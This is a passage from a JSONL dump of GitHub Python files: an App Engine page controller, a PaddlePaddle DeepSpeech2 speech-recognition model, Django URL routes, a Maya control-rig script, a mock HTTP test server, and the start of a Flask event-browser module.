page.content = \"\"\r\n page.breadcrumb = \"\"\r\n page.visible = True\r\n\r\n if not page.breadcrumb:\r\n page.breadcrumb = \"\"\r\n\r\n return page\r\n\r\n def getBlockLinkByRegion(self, region, page):\r\n query = BlockLink.gql(\"WHERE region = :region AND pageId = :pageId\", region=region, pageId=page.id())\r\n\r\n if query.count()>0:\r\n return query[0]\r\n else:\r\n blockLink = BlockLink()\r\n blockLink.region = region\r\n blockLink.pageId = page.id()\r\n return blockLink\r\n\r\n\r\nclass AllPage(webapp.RequestHandler):\r\n def get(self):\r\n if util.checkAuth(self, False):\r\n items = db.GqlQuery(\"SELECT * FROM Page ORDER BY url ASC LIMIT 100\")\r\n values = {'context':RequestContext(),'list':items, 'request':self.request}\r\n self.response.out.write(template.render('templates/admin/pageAll.html',values))\r\n\r\n\r\n","repo_name":"janvandenbussche/website-sintjan","sub_path":"sintjan/controllers/admin/pages.py","file_name":"pages.py","file_ext":"py","file_size_in_byte":3959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5285566022","text":"import sys\nimport os\nimport time\nimport logging\nimport gzip\nimport copy\nimport inspect\nimport collections\nimport multiprocessing\nimport numpy as np\nfrom distutils.dir_util import mkpath\nimport paddle.fluid as fluid\nimport paddle.fluid.compiler as compiler\nfrom decoders.swig_wrapper import Scorer\nfrom decoders.swig_wrapper import ctc_greedy_decoder\nfrom decoders.swig_wrapper import ctc_beam_search_decoder_batch\nfrom model_utils.network import deep_speech_v2_network\n\nlogging.basicConfig(\n format='[%(levelname)s %(asctime)s %(filename)s:%(lineno)d] %(message)s')\n\n\nclass DeepSpeech2Model(object):\n \"\"\"DeepSpeech2Model class.\n\n :param vocab_size: Decoding vocabulary size.\n :type vocab_size: int\n :param num_conv_layers: Number of stacking convolution layers.\n :type num_conv_layers: int\n :param num_rnn_layers: Number of stacking RNN layers.\n :type num_rnn_layers: int\n :param rnn_layer_size: RNN layer size (number of RNN cells).\n :type rnn_layer_size: int\n :param use_gru: Use gru if set True. Use simple rnn if set False.\n :type use_gru: bool\n :param share_rnn_weights: Whether to share input-hidden weights between\n forward and backward directional RNNs.Notice that\n for GRU, weight sharing is not supported.\n :type share_rnn_weights: bool\n :param place: Program running place.\n :type place: CPUPlace or CUDAPlace\n :param init_from_pretrained_model: Pretrained model path. If None, will train\n from stratch.\n :type init_from_pretrained_model: string|None\n :param output_model_dir: Output model directory. If None, output to current directory. 
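Editor's note on the GAE `pages.py` record above: `getBlockLinkByRegion` is a classic get-or-create, querying for an existing `BlockLink` and building a fresh one on a miss. A hedged plain-Python restatement of that control flow, with the GqlQuery swapped for a dict lookup (all names here are illustrative):

```python
# Get-or-create pattern distilled from getBlockLinkByRegion above.
def get_or_create(store, key, factory):
    if key in store:
        return store[key]
    obj = factory()
    store[key] = obj
    return obj

blocks = {}
link = get_or_create(blocks, ('left', 42),
                     lambda: {'region': 'left', 'pageId': 42})
print(link)
```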
\n :type output_model_dir: string|None\n \"\"\"\n\n def __init__(self,\n vocab_size,\n num_conv_layers,\n num_rnn_layers,\n rnn_layer_size,\n use_gru=False,\n share_rnn_weights=True,\n place=fluid.CPUPlace(),\n init_from_pretrained_model=None,\n output_model_dir=None):\n self._vocab_size = vocab_size\n self._num_conv_layers = num_conv_layers\n self._num_rnn_layers = num_rnn_layers\n self._rnn_layer_size = rnn_layer_size\n self._use_gru = use_gru\n self._share_rnn_weights = share_rnn_weights\n self._place = place\n self._init_from_pretrained_model = init_from_pretrained_model\n self._output_model_dir = output_model_dir\n self._ext_scorer = None\n self.logger = logging.getLogger(\"\")\n self.logger.setLevel(level=logging.INFO)\n\n def create_network(self, is_infer=False):\n \"\"\"Create data layers and model network.\n :param is_training: Whether to create a network for training.\n :type is_training: bool \n :return reader: Reader for input.\n :rtype reader: read generater\n :return log_probs: An output unnormalized log probability layer.\n :rtype lig_probs: Varable\n :return loss: A ctc loss layer.\n :rtype loss: Variable\n \"\"\"\n\n if not is_infer:\n input_fields = {\n 'names': ['audio_data', 'text_data', 'seq_len_data', 'masks'],\n 'shapes':\n [[None, 161, None], [None, 1], [None, 1], [None, 32, 81, None]],\n 'dtypes': ['float32', 'int32', 'int64', 'float32'],\n 'lod_levels': [0, 1, 0, 0]\n }\n\n inputs = [\n fluid.data(\n name=input_fields['names'][i],\n shape=input_fields['shapes'][i],\n dtype=input_fields['dtypes'][i],\n lod_level=input_fields['lod_levels'][i])\n for i in range(len(input_fields['names']))\n ]\n\n reader = fluid.io.DataLoader.from_generator(\n feed_list=inputs,\n capacity=64,\n iterable=False,\n use_double_buffer=True)\n\n (audio_data, text_data, seq_len_data, masks) = inputs\n else:\n audio_data = fluid.data(\n name='audio_data',\n shape=[None, 161, None],\n dtype='float32',\n lod_level=0)\n seq_len_data = fluid.data(\n name='seq_len_data',\n shape=[None, 1],\n dtype='int64',\n lod_level=0)\n masks = fluid.data(\n name='masks',\n shape=[None, 32, 81, None],\n dtype='float32',\n lod_level=0)\n text_data = None\n reader = fluid.DataFeeder([audio_data, seq_len_data, masks],\n self._place)\n\n log_probs, loss = deep_speech_v2_network(\n audio_data=audio_data,\n text_data=text_data,\n seq_len_data=seq_len_data,\n masks=masks,\n dict_size=self._vocab_size,\n num_conv_layers=self._num_conv_layers,\n num_rnn_layers=self._num_rnn_layers,\n rnn_size=self._rnn_layer_size,\n use_gru=self._use_gru,\n share_rnn_weights=self._share_rnn_weights)\n return reader, log_probs, loss\n\n def init_from_pretrained_model(self, exe, program):\n '''Init params from pretrain model. 
'''\n\n assert isinstance(self._init_from_pretrained_model, str)\n\n if not os.path.exists(self._init_from_pretrained_model):\n print(self._init_from_pretrained_model)\n raise Warning(\"The pretrained params do not exist.\")\n return False\n fluid.io.load_params(\n exe,\n self._init_from_pretrained_model,\n main_program=program,\n filename=\"params.pdparams\")\n\n print(\"finish initing model from pretrained params from %s\" %\n (self._init_from_pretrained_model))\n\n pre_epoch = 0\n dir_name = self._init_from_pretrained_model.split('_')\n if len(dir_name) >= 2 and dir_name[-2].endswith('epoch') and dir_name[\n -1].isdigit():\n pre_epoch = int(dir_name[-1])\n\n return pre_epoch + 1\n\n def save_param(self, exe, program, dirname):\n '''Save model params to dirname'''\n\n assert isinstance(self._output_model_dir, str)\n\n param_dir = os.path.join(self._output_model_dir)\n\n if not os.path.exists(param_dir):\n os.mkdir(param_dir)\n\n fluid.io.save_params(\n exe,\n os.path.join(param_dir, dirname),\n main_program=program,\n filename=\"params.pdparams\")\n print(\"save parameters at %s\" % (os.path.join(param_dir, dirname)))\n\n return True\n\n def test(self, exe, dev_batch_reader, test_program, test_reader,\n fetch_list):\n '''Test the model.\n\n :param exe:The executor of program.\n :type exe: Executor\n :param dev_batch_reader: The reader of test dataa.\n :type dev_batch_reader: read generator \n :param test_program: The program of test.\n :type test_program: Program\n :param test_reader: Reader of test.\n :type test_reader: Reader\n :param fetch_list: Fetch list.\n :type fetch_list: list\n :return: An output unnormalized log probability. \n :rtype: array\n '''\n test_reader.start()\n epoch_loss = []\n while True:\n try:\n each_loss = exe.run(\n program=test_program,\n fetch_list=fetch_list,\n return_numpy=False)\n epoch_loss.extend(np.array(each_loss[0]))\n\n except fluid.core.EOFException:\n test_reader.reset()\n break\n return np.mean(np.array(epoch_loss))\n\n def train(self,\n train_batch_reader,\n dev_batch_reader,\n feeding_dict,\n learning_rate,\n gradient_clipping,\n num_epoch,\n batch_size,\n num_samples,\n save_epoch=100,\n num_iterations_print=100,\n test_off=False):\n \"\"\"Train the model.\n\n :param train_batch_reader: Train data reader.\n :type train_batch_reader: callable\n :param dev_batch_reader: Validation data reader.\n :type dev_batch_reader: callable\n :param feeding_dict: Feeding is a map of field name and tuple index\n of the data that reader returns.\n :type feeding_dict: dict|list\n :param learning_rate: Learning rate for ADAM optimizer.\n :type learning_rate: float\n :param gradient_clipping: Gradient clipping threshold.\n :type gradient_clipping: float\n :param num_epoch: Number of training epochs.\n :type num_epoch: int\n :param batch_size: Number of batch size.\n :type batch_size: int\n :param num_samples: The num of train samples.\n :type num_samples: int\n :param save_epoch: Number of training iterations for save checkpoint and params.\n :type save_epoch: int\n :param num_iterations_print: Number of training iterations for printing\n a training loss.\n :type num_iteratons_print: int\n :param test_off: Turn off testing.\n :type test_off: bool\n \"\"\"\n # prepare model output directory\n if not os.path.exists(self._output_model_dir):\n mkpath(self._output_model_dir)\n\n # adapt the feeding dict according to the network\n adapted_feeding_dict = self._adapt_feeding_dict(feeding_dict)\n\n if isinstance(self._place, fluid.CUDAPlace):\n dev_count = 
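Editor's note on the DeepSpeech record above: `init_from_pretrained_model` resumes the epoch counter by splitting the checkpoint path on `'_'` and inspecting the last two pieces. A compact restatement of just that parsing (the paths are made up):

```python
# Mirrors the epoch-resume parsing in init_from_pretrained_model above:
# ".../epoch_12" resumes at 13; anything else starts at pre_epoch 0 + 1.
def resume_epoch(path):
    parts = path.split('_')
    if len(parts) >= 2 and parts[-2].endswith('epoch') and parts[-1].isdigit():
        return int(parts[-1]) + 1
    return 1

print(resume_epoch('checkpoints/epoch_12'), resume_epoch('checkpoints/final'))
# -> 13 1
```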
fluid.core.get_cuda_device_count()\n else:\n dev_count = int(os.environ.get('CPU_NUM', 1))\n\n # prepare the network\n train_program = fluid.Program()\n startup_prog = fluid.Program()\n with fluid.program_guard(train_program, startup_prog):\n with fluid.unique_name.guard():\n train_reader, log_probs, ctc_loss = self.create_network()\n # prepare optimizer\n optimizer = fluid.optimizer.AdamOptimizer(\n learning_rate=fluid.layers.exponential_decay(\n learning_rate=learning_rate,\n decay_steps=num_samples / batch_size / dev_count,\n decay_rate=0.83,\n staircase=True),\n grad_clip=fluid.clip.GradientClipByGlobalNorm(\n clip_norm=gradient_clipping))\n optimizer.minimize(loss=ctc_loss)\n\n test_prog = fluid.Program()\n with fluid.program_guard(test_prog, startup_prog):\n with fluid.unique_name.guard():\n test_reader, _, ctc_loss = self.create_network()\n\n test_prog = test_prog.clone(for_test=True)\n\n exe = fluid.Executor(self._place)\n exe.run(startup_prog)\n\n # init from some pretrain models, to better solve the current task\n pre_epoch = 0\n if self._init_from_pretrained_model:\n pre_epoch = self.init_from_pretrained_model(exe, train_program)\n\n build_strategy = compiler.BuildStrategy()\n exec_strategy = fluid.ExecutionStrategy()\n\n # pass the build_strategy to with_data_parallel API\n compiled_prog = compiler.CompiledProgram(\n train_program).with_data_parallel(\n loss_name=ctc_loss.name,\n build_strategy=build_strategy,\n exec_strategy=exec_strategy)\n\n train_reader.set_batch_generator(train_batch_reader)\n test_reader.set_batch_generator(dev_batch_reader)\n\n # run train \n for epoch_id in range(num_epoch):\n train_reader.start()\n epoch_loss = []\n time_begin = time.time()\n batch_id = 0\n step = 0\n while True:\n try:\n fetch_list = [ctc_loss.name]\n\n if batch_id % num_iterations_print == 0:\n fetch = exe.run(\n program=compiled_prog,\n fetch_list=fetch_list,\n return_numpy=False)\n each_loss = fetch[0]\n epoch_loss.extend(np.array(each_loss[0]) / batch_size)\n\n print(\"epoch: %d, batch: %d, train loss: %f\\n\" %\n (epoch_id, batch_id,\n np.mean(each_loss[0]) / batch_size))\n\n else:\n each_loss = exe.run(\n program=compiled_prog,\n fetch_list=[],\n return_numpy=False)\n\n batch_id = batch_id + 1\n except fluid.core.EOFException:\n train_reader.reset()\n break\n time_end = time.time()\n used_time = time_end - time_begin\n if test_off:\n print(\"\\n--------Time: %f sec, epoch: %d, train loss: %f\\n\" %\n (used_time, epoch_id, np.mean(np.array(epoch_loss))))\n else:\n print('\\n----------Begin test...')\n test_loss = self.test(\n exe,\n dev_batch_reader=dev_batch_reader,\n test_program=test_prog,\n test_reader=test_reader,\n fetch_list=[ctc_loss])\n print(\n \"--------Time: %f sec, epoch: %d, train loss: %f, test loss: %f\"\n % (used_time, epoch_id + pre_epoch,\n np.mean(np.array(epoch_loss)), test_loss / batch_size))\n if (epoch_id + 1) % save_epoch == 0:\n self.save_param(exe, train_program,\n \"epoch_\" + str(epoch_id + pre_epoch))\n\n self.save_param(exe, train_program, \"step_final\")\n\n print(\"\\n------------Training finished!!!-------------\")\n\n def infer_batch_probs(self, infer_data, feeding_dict):\n \"\"\"Infer the prob matrices for a batch of speech utterances.\n :param infer_data: List of utterances to infer, with each utterance\n consisting of a tuple of audio features and\n transcription text (empty string).\n :type infer_data: list\n :param feeding_dict: Feeding is a map of field name and tuple index\n of the data that reader returns.\n :type feeding_dict: 
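Editor's note: the `AdamOptimizer` above wraps a staircase exponential decay. A hedged restatement of the schedule it requests (this is the conventional staircase formula, not the Paddle source):

```python
# lr(step) = base_lr * decay_rate ** floor(step / decay_steps),
# matching fluid.layers.exponential_decay(..., staircase=True) as configured.
def staircase_lr(base_lr, step, decay_steps, decay_rate=0.83):
    return base_lr * decay_rate ** (step // decay_steps)

print(staircase_lr(5e-4, 2500, 1000))  # -> 5e-4 * 0.83**2
```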
dict|list\n :return: List of 2-D probability matrix, and each consists of prob\n vectors for one speech utterancce.\n :rtype: List of matrix\n \"\"\"\n # define inferer\n infer_program = fluid.Program()\n startup_prog = fluid.Program()\n\n # adapt the feeding dict according to the network\n adapted_feeding_dict = self._adapt_feeding_dict(feeding_dict)\n\n # prepare the network\n with fluid.program_guard(infer_program, startup_prog):\n with fluid.unique_name.guard():\n feeder, log_probs, _ = self.create_network(is_infer=True)\n\n infer_program = infer_program.clone(for_test=True)\n exe = fluid.Executor(self._place)\n exe.run(startup_prog)\n\n # init param from pretrained_model\n if not self._init_from_pretrained_model:\n exit(\"No pretrain model file path!\")\n self.init_from_pretrained_model(exe, infer_program)\n\n infer_results = []\n time_begin = time.time()\n\n # run inference\n for i in range(infer_data[0].shape[0]):\n each_log_probs = exe.run(\n program=infer_program,\n feed=feeder.feed(\n [[infer_data[0][i], infer_data[2][i], infer_data[3][i]]]),\n fetch_list=[log_probs],\n return_numpy=False)\n infer_results.extend(np.array(each_log_probs[0]))\n\n # slice result \n infer_results = np.array(infer_results)\n seq_len = (infer_data[2] - 1) // 3 + 1\n\n start_pos = [0] * (infer_data[0].shape[0] + 1)\n for i in range(infer_data[0].shape[0]):\n start_pos[i + 1] = start_pos[i] + seq_len[i][0]\n probs_split = [\n infer_results[start_pos[i]:start_pos[i + 1]]\n for i in range(0, infer_data[0].shape[0])\n ]\n\n return probs_split\n\n def decode_batch_greedy(self, probs_split, vocab_list):\n \"\"\"Decode by best path for a batch of probs matrix input.\n :param probs_split: List of 2-D probability matrix, and each consists\n of prob vectors for one speech utterancce.\n :param probs_split: List of matrix\n :param vocab_list: List of tokens in the vocabulary, for decoding.\n :type vocab_list: list\n :return: List of transcription texts.\n :rtype: List of str\n \"\"\"\n results = []\n for i, probs in enumerate(probs_split):\n output_transcription = ctc_greedy_decoder(\n probs_seq=probs, vocabulary=vocab_list)\n results.append(output_transcription)\n print(results)\n return results\n\n def init_ext_scorer(self, beam_alpha, beam_beta, language_model_path,\n vocab_list):\n \"\"\"Initialize the external scorer.\n :param beam_alpha: Parameter associated with language model.\n :type beam_alpha: float\n :param beam_beta: Parameter associated with word count.\n :type beam_beta: float\n :param language_model_path: Filepath for language model. 
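Editor's note: the result slicing in `infer_batch_probs` above first shrinks each utterance length by the conv stack's factor of 3, then builds prefix sums to cut one flat probability matrix back into per-utterance chunks. A hedged NumPy restatement with toy lengths (the original keeps lengths as 1-element arrays; scalars are used here for brevity):

```python
# Prefix-sum slicing as in infer_batch_probs above, on made-up lengths.
import numpy as np

seq_len = [(l - 1) // 3 + 1 for l in (9, 7, 12)]    # conv downsampling by 3
start_pos = np.concatenate([[0], np.cumsum(seq_len)])
flat = np.arange(sum(seq_len))                      # stands in for infer_results
probs_split = [flat[start_pos[i]:start_pos[i + 1]] for i in range(len(seq_len))]
print(seq_len, [p.tolist() for p in probs_split])
```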
If it is\n empty, the external scorer will be set to\n None, and the decoding method will be pure\n beam search without scorer.\n :type language_model_path: str|None\n :param vocab_list: List of tokens in the vocabulary, for decoding.\n :type vocab_list: list\n \"\"\"\n if language_model_path != '':\n self.logger.info(\"begin to initialize the external scorer \"\n \"for decoding\")\n self._ext_scorer = Scorer(beam_alpha, beam_beta,\n language_model_path, vocab_list)\n lm_char_based = self._ext_scorer.is_character_based()\n lm_max_order = self._ext_scorer.get_max_order()\n lm_dict_size = self._ext_scorer.get_dict_size()\n self.logger.info(\"language model: \"\n \"is_character_based = %d,\" % lm_char_based +\n \" max_order = %d,\" % lm_max_order +\n \" dict_size = %d\" % lm_dict_size)\n self.logger.info(\"end initializing scorer\")\n else:\n self._ext_scorer = None\n self.logger.info(\"no language model provided, \"\n \"decoding by pure beam search without scorer.\")\n\n def decode_batch_beam_search(self, probs_split, beam_alpha, beam_beta,\n beam_size, cutoff_prob, cutoff_top_n,\n vocab_list, num_processes):\n \"\"\"Decode by beam search for a batch of probs matrix input.\n :param probs_split: List of 2-D probability matrix, and each consists\n of prob vectors for one speech utterancce.\n :param probs_split: List of matrix\n :param beam_alpha: Parameter associated with language model.\n :type beam_alpha: float\n :param beam_beta: Parameter associated with word count.\n :type beam_beta: float\n :param beam_size: Width for Beam search.\n :type beam_size: int\n :param cutoff_prob: Cutoff probability in pruning,\n default 1.0, no pruning.\n :type cutoff_prob: float\n :param cutoff_top_n: Cutoff number in pruning, only top cutoff_top_n\n characters with highest probs in vocabulary will be\n used in beam search, default 40.\n :type cutoff_top_n: int\n :param vocab_list: List of tokens in the vocabulary, for decoding.\n :type vocab_list: list\n :param num_processes: Number of processes (CPU) for decoder.\n :type num_processes: int\n :return: List of transcription texts.\n :rtype: List of str\n \"\"\"\n if self._ext_scorer != None:\n self._ext_scorer.reset_params(beam_alpha, beam_beta)\n # beam search decode\n num_processes = min(num_processes, len(probs_split))\n beam_search_results = ctc_beam_search_decoder_batch(\n probs_split=probs_split,\n vocabulary=vocab_list,\n beam_size=beam_size,\n num_processes=num_processes,\n ext_scoring_func=self._ext_scorer,\n cutoff_prob=cutoff_prob,\n cutoff_top_n=cutoff_top_n)\n\n results = [result[0][1] for result in beam_search_results]\n return results\n\n def _adapt_feeding_dict(self, feeding_dict):\n \"\"\"Adapt feeding dict according to network struct.\n\n To remove impacts from padding part, we add scale_sub_region layer and\n sub_seq layer. For sub_seq layer, 'sequence_offset' and\n 'sequence_length' fields are appended. 
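Editor's note: `decode_batch_greedy` above delegates to the swig `ctc_greedy_decoder`, whose source is not in this record. A pure-Python sketch of what best-path CTC decoding conventionally computes (framewise argmax, collapse repeats, drop the blank symbol; the blank-is-last-index convention is an assumption here):

```python
# Best-path (greedy) CTC decoding, assuming blank = len(vocab).
import numpy as np

def greedy_ctc(probs, vocab):
    blank = len(vocab)
    best = np.argmax(probs, axis=1)
    out, prev = [], blank
    for idx in best:
        if idx != prev and idx != blank:
            out.append(vocab[idx])
        prev = idx
    return ''.join(out)

probs = np.array([[0.6, 0.3, 0.1], [0.6, 0.3, 0.1],
                  [0.1, 0.3, 0.6], [0.2, 0.7, 0.1]])
print(greedy_ctc(probs, ['a', 'b']))  # -> "ab" (repeats collapse, blank drops)
```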
For each scale_sub_region layer\n 'convN_index_range' field is appended.\n\n :param feeding_dict: Feeding is a map of field name and tuple index\n of the data that reader returns.\n :type feeding_dict: dict|list\n :return: Adapted feeding dict.\n :rtype: dict|list\n \"\"\"\n adapted_feeding_dict = copy.deepcopy(feeding_dict)\n if isinstance(feeding_dict, dict):\n adapted_feeding_dict[\"sequence_offset\"] = len(adapted_feeding_dict)\n adapted_feeding_dict[\"sequence_length\"] = len(adapted_feeding_dict)\n for i in range(self._num_conv_layers):\n adapted_feeding_dict[\"conv%d_index_range\" %i] = \\\n len(adapted_feeding_dict)\n elif isinstance(feeding_dict, list):\n adapted_feeding_dict.append(\"sequence_offset\")\n adapted_feeding_dict.append(\"sequence_length\")\n for i in range(self._num_conv_layers):\n adapted_feeding_dict.append(\"conv%d_index_range\" % i)\n else:\n raise ValueError(\"Type of feeding_dict is %s, not supported.\" %\n type(feeding_dict))\n\n return adapted_feeding_dict\n","repo_name":"RoBorregos/robocup-home","sub_path":"catkin_home/src/action_selectors/scripts/DeepSpeech/model_utils/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":22640,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"48"} +{"seq_id":"2666719149","text":"from django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n url(r'^login$', views.user_login),\n url(r'^logout$', views.user_logout),\n url(r'^signup$', views.signup),\n url(r'^account$', views.account),\n url(r'^statistics$', views.statistics),\n]","repo_name":"andresf01/ProyectoDS2","sub_path":"apps/accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3904057283","text":"import maya.cmds as cmds\n\ndef Color():\n sels = cmds.ls(selection=True)\n \n for sel in sels:\n Col = cmds.color(sels, rgb=(1, 0, 0))\n cmds.curve(Col)\n\nColor()\n\ndef Match():\n sels = cmds.ls(selection=True)\n \n for sel in sels:\n Cir = cmds.circle()\n cmds.parent(Cir, sel)\n Grp = cmds.group(empty=True)\n Grp = cmds.rename(Grp, sel + \"_Grp\")\n Grp = cmds.parent(sel, Grp)\n \n newPos = cmds.xform(sel, q=True, rp=True, ws=True) \n newRot = cmds.xform(sel, q=True, ro=True, ws=True)\n cmds.xform(Grp, t=newPos, ws=True) \n cmds.xform(Grp, ro=newRot, ws=True)\n cmds.xform(Cir, t=newPos, ws=True)\n cmds.xform(Cir, ro=newRot, ws=True) \n \n cmds.rename(sel+\"_Geo\")\n \nMatch()","repo_name":"GraceBelt/DGM-3670_Fall2021","sub_path":"Assignment_Assign Color_Create Control.py","file_name":"Assignment_Assign Color_Create Control.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27666320230","text":"import multiprocessing\nimport os\nimport re\nimport shutil\nimport json\nimport requests\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\nfrom .routes import routes\n\nnext_payload = None\nnext_status_code = -1\nnext_path_regex = None\nlast_request = None\n\n\n'''\nBased on the implementation of @tliron\nhttps://gist.github.com/tliron/8e9757180506f25e46d9\n\n'''\n\n\nclass TestHTTPServer(BaseHTTPRequestHandler):\n def __init__(self, *args, **kwargs):\n self.routes = routes\n BaseHTTPRequestHandler.__init__(self, *args, **kwargs)\n\n def do_HEAD(self):\n self.handle_method('HEAD')\n\n def do_GET(self):\n self.handle_method('GET')\n\n def do_POST(self):\n 
self.handle_method('POST')\n\n def do_PUT(self):\n self.handle_method('PUT')\n\n def do_DELETE(self):\n self.handle_method('DELETE')\n\n def get_route(self):\n for path, route in self.routes.items():\n if re.match(path, self.path):\n return route\n return None\n\n def get_payload(self):\n payload_len = int(self.headers['content-length'])\n payload = self.rfile.read(payload_len)\n payload = json.loads(payload)\n return payload\n\n def check_for_next_response(self):\n global next_status_code\n global next_payload\n global next_path_regex\n global last_request\n\n if self.path == '/set-response':\n payload = self.get_payload()\n next_status_code = payload['status_code']\n next_payload = payload['payload']\n next_path_regex = re.compile(\n payload['path_regex']) if 'path_regex' in payload else None\n self.send_response(200)\n self.end_headers()\n return True\n elif self.path == '/clear-response':\n next_status_code = -1\n next_payload = None\n next_path_regex = None\n self.send_response(200)\n self.end_headers()\n return True\n elif self.path == '/last-request':\n self.send_response(200)\n self.end_headers()\n self.wfile.write(bytes(json.dumps(last_request), 'utf-8'))\n return True\n return False\n\n def handle_method(self, method):\n global next_status_code\n global next_payload\n global last_request\n global next_path_regex\n\n if self.check_for_next_response():\n return\n\n last_request = {\n 'method': method,\n 'path': self.path,\n 'payload': self.get_payload() if self.headers['content-length'] and int(self.headers['content-length']) > 0 else None\n }\n\n if (next_status_code > -1) and (not next_payload is None) and ((next_path_regex is None) or next_path_regex.search(self.path)):\n self.send_response(next_status_code)\n self.send_header('Content-type', 'application/json')\n self.end_headers()\n self.wfile.write(bytes(json.dumps(next_payload), 'utf-8'))\n else:\n route = self.get_route()\n if route is None:\n self.send_response(404)\n self.end_headers()\n self.wfile.write(bytes('Route not found\\n', 'utf-8'))\n else:\n if method == 'HEAD':\n self.send_response(200)\n if 'media_type' in route:\n self.send_header('Content-type', route['media_type'])\n self.end_headers()\n else:\n if 'file' in route:\n if method == 'GET':\n try:\n f = open(os.path.join(here, route['file']))\n try:\n self.send_response(200)\n if 'media_type' in route:\n self.send_header(\n 'Content-type', route['media_type'])\n self.end_headers()\n shutil.copyfileobj(f, self.wfile)\n finally:\n f.close()\n except:\n self.send_response(404)\n self.end_headers()\n self.wfile.write(\n bytes('File not found\\n', 'utf-8')\n )\n else:\n self.send_response(405)\n self.end_headers()\n self.wfile.write(\n bytes('Only GET is supported\\n', 'utf-8')\n )\n else:\n if method in route:\n content = route[method](self)\n if content is not None:\n self.send_response(200)\n if 'media_type' in route:\n self.send_header(\n 'Content-type', route['media_type'])\n self.end_headers()\n if method != 'DELETE':\n self.wfile.write(\n bytes(json.dumps(content), 'utf-8'))\n else:\n self.send_response(404)\n self.end_headers()\n self.wfile.write(bytes('Not found\\n', 'utf-8'))\n else:\n self.send_response(405)\n self.end_headers()\n self.wfile.write(\n bytes(method + ' is not supported\\n', 'utf-8'))\n\n\nserver_address = ('127.0.0.1', 2020)\n\n\ndef start_server():\n httpd = HTTPServer(server_address, TestHTTPServer)\n try:\n httpd.serve_forever()\n except KeyboardInterrupt:\n pass\n httpd.server_close()\n\n\ndef set_next_response(status_code, payload, 
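Editor's note on the test-server record above: `get_route` picks the first route whose pattern `re.match`-es the request path. `re.match` anchors only at the start, so a pattern like `^/users` also matches `/users/17/posts` unless it ends with `$`. A tiny illustration of that dispatch:

```python
# First-match regex routing as in get_route above (hypothetical routes).
import re

routes = {r'^/users/\d+$': 'user-detail', r'^/users': 'user-list'}

def get_route(path):
    for pattern, name in routes.items():
        if re.match(pattern, path):
            return name
    return None

print(get_route('/users/17'), get_route('/users/17/posts'), get_route('/nope'))
# -> user-detail user-list None
```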
path_regex=None):\n request = {'status_code': status_code, 'payload': payload}\n if path_regex is not None:\n request['path_regex'] = path_regex\n try:\n response = requests.post(\n url='http://%s:%d/set-response' % server_address,\n json=request\n )\n return response.status_code == 200\n except:\n pass\n\n\ndef clear_next_response():\n try:\n response = requests.post(\n url='http://%s:%d/clear-response' % server_address\n )\n return response.status_code == 200\n except:\n pass\n\n\ndef get_last_request():\n try:\n response = requests.get(\n url='http://%s:%d/last-request' % server_address\n )\n return response.json()\n except:\n pass\n\n\n_process = None\n\n\ndef start():\n _process = multiprocessing.Process(target=start_server, args=())\n _process.daemon = True\n _process.start()\n\n\ndef stop():\n if not _process is None:\n _process.stop()\n","repo_name":"quickdata-team/panamah-sdk-python","sub_path":"tests/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":7193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16285263852","text":"from flask_wtf import FlaskForm\nfrom flask import Blueprint, request, render_template, flash, redirect, session\nfrom flask_login import login_required, current_user\nfrom app import CONFIG\nfrom . import web_module as mod_web\nfrom . import controllers as controller\nfrom .forms import *\nfrom .models import *\nimport json\nimport requests\n\ntagColors = {\n\t\"Music\": \"CornflowerBlue\",\n\t\"Dance\": \"IndianRed\",\n\t\"Lecture\": \"purple\",\n\t\"Theater\": \"green\",\n\t\"Street\": \"gray\",\n\t\"Orientation\": \"orange\"\n}\n\n# Homepage\n@mod_web.route('/')\ndef home():\n\t# User is not logged in.\n\tif not current_user.is_authenticated and \"guest_mode\" not in session:\n\t\treturn redirect(\"/welcome\")\n\treturn redirect(\"/browse\")\n\t\n# Splash page\n@mod_web.route('/welcome')\ndef welcome():\n\tif \"proceed\" in request.args:\n\t\tsession[\"guest_mode\"] = True\n\t\treturn redirect(\"/browse\")\n\treturn render_template(\"web/splashpage.html\")\n\n@mod_web.route('/browse', methods=['GET', 'POST'])\ndef browser():\n\tif request.method == \"POST\":\n\t\tform = ReportForm(request.form)\n\n\t\tif \"category\" not in request.form:\n\t\t\tflash(\"Error: Reason cannot be empty.\")\n\t\t\treturn render_template(\"web/browser.html\", formR=ReportForm(), wasError=True)\n\t\t\n\t\teventData = {\"reason\": request.form[\"category\"] + \": \" + request.form[\"description\"]}\n\t\theaders = { \"Authorization\" : \"Token %s\" % current_user.token }\n\t\tr = requests.put(CONFIG[\"BASE_URL\"]+\"/api/event/report/\" + request.form['event_id'], \n\t\t\tjson = eventData, headers = headers)\n\t\tr = json.loads(r.text)\n\t\tif r[\"status\"] == \"Success\":\n\t\t\tflash(\"The event has successfully been reported.\")\n\t\t\treturn render_template(\"web/browser.html\", formR=ReportForm())\n\t\telse:\n\t\t\tflash(\"Error in reporting event: \" + r[\"error_msg\"])\n\t\t\treturn render_template(\"web/browser.html\", formR=ReportForm(), wasError=True)\n\n\tif \"USE_MOCK_DATA\" in CONFIG and CONFIG[\"USE_MOCK_DATA\"]:\n\t\t# Ignore USE_MOCK_DATA flag if not in DEBUG mode.\n\t\tif CONFIG[\"DEBUG\"]:\n\t\t\twith open('app/static/mock_data/data.json', 'r') as f:\n\t\t\t\tdata = json.load(f)\n\t\t\t\treturn render_template(\"web/browser.html\", data = data)\n\t\t\tprint(\"Error loading mock data.\")\n\treturn render_template(\"web/browser.html\", 
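Editor's note: two small bugs close the test-server record above. `start()` assigns a local `_process`, so the module-level global stays `None`, and `stop()` calls `_process.stop()`, a method `multiprocessing.Process` does not have; `terminate()`/`join()` is the standard shutdown. Sketched against a trivial worker:

```python
# Corrected process lifecycle for the helpers above.
import multiprocessing
import time

def worker():
    while True:
        time.sleep(0.1)

if __name__ == '__main__':
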